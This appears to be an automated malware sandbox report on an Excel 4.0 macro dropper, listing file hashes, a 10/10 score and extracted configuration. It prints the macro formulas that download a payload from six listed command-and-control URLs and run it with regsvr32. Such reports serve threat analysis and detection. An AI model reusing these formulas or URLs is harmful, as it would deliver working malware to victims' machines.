General

  • Target

    5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

  • Size

    40KB

  • Sample

    241120-pq7ytawfrd

  • MD5

    87a1c5bd3f5bef714ab8ab4d8155d261

  • SHA1

    9a51be90a17a0e5d5fe469e45a7a0d0b52648429

  • SHA256

    5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

  • SHA512

    569404ebf87fe5e436b675019880719c15959db0b880e2999775647ab6ddaf524e0b756485382d3bd5aaee29c7dd338e9b1910f2dc2bc73db9eaeaaf1adfe941

  • SSDEEP

    768:5qoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:XOom8eDGylND59V4jwmXc2CVfIb

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://asempaye.com/404/zREXldL8ZfpsEepiC/

https://freesoft18.com/urq/dd1s9WyDLkdM/

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

https://pedroribeiro.work/wp-admin/qOkQQ/

https://hojeemdia.life/detector/klwHgC9eat/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0)
    =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0))
    =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0))
    =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0))
    =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0))
    =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0))
    =IF('EFALGV'!D20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx")
    =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/

xlm40.dropper

https://freesoft18.com/urq/dd1s9WyDLkdM/

xlm40.dropper

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

xlm40.dropper

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

xlm40.dropper

https://pedroribeiro.work/wp-admin/qOkQQ/

xlm40.dropper

https://hojeemdia.life/detector/klwHgC9eat/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/

Targets

    • Target

      5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

    • Size

      40KB

    • MD5

      87a1c5bd3f5bef714ab8ab4d8155d261

    • SHA1

      9a51be90a17a0e5d5fe469e45a7a0d0b52648429

    • SHA256

      5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

    • SHA512

      569404ebf87fe5e436b675019880719c15959db0b880e2999775647ab6ddaf524e0b756485382d3bd5aaee29c7dd338e9b1910f2dc2bc73db9eaeaaf1adfe941

    • SSDEEP

      768:5qoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:XOom8eDGylND59V4jwmXc2CVfIb

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks